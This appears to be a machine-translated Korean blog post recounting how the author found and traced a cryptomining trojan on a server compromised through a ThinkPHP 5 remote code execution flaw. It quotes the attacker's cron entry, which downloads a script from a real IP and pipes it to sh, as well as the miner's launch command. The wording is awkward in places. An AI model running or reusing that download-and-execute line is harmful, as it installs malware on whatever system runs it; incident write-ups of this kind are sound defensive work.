어제 서버가 갑자기 느려진 것을 발견했습니다. Top은 여러 프로세스가 100% 이상을 사용하고 있음을 보여주었습니다. CPU
다음 명령을 실행하세요:
/tmp/php -s /tmp/p2.conf
해킹된 것이 거의 확실합니다
다음 단계는 소스를 확인하는 것입니다
마지막에는 로그인 기록이 없습니다
이러한 프로세스를 먼저 종료하지만 몇 시간 후에 다시 나타납니다. 분
먼저 이 트로이 목마가 무엇을 하려는지 살펴보겠습니다
netstat 이 트로이 목마가 포트를 열고 외국 IP와 연결을 맺는 것을 봤습니다
그런데 tcpdump는 한동안 어떤 데이터 전송도 찾지 못했습니다
그가 원하는 것은 무엇이었나요? 할?
로그를 계속 확인해 보세요
크론 로그에서 www 사용자가 crontab 타이밍 작업을 하고 있는 것을 발견했는데, 이것이 기본적으로 문제입니다
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
몇 가지 질문을 다운받아 살펴보니 마이닝 트로이 목마 프로그램임에 틀림없습니다
Server 웹사이트의 www 사용자는 lnmp를 설치하여 생성되었습니다. 소스를 보면 웹 취약점일 수 있습니다.
다시 보니 /tmp 아래의 php 권한은 www입니다.
lnmp 아래 여러 사이트의 로그를 확인해 보니 최근 thinkphp 5에서 노출된 원격 코드 실행 취약점이 악용된 것을 발견할 수 있습니다.
취약점 세부정보: https:/ /nosec.org/home/detail/2050.html
문제를 수리하고 해결하세요
하지만 이 사이트는 테스트 사이트이고 포트 수신 대기는 8083입니다. 이제 해커가 색다른 포트를 스니핑할 수 있을까요?
출처: https://www.simapple.com/425.html
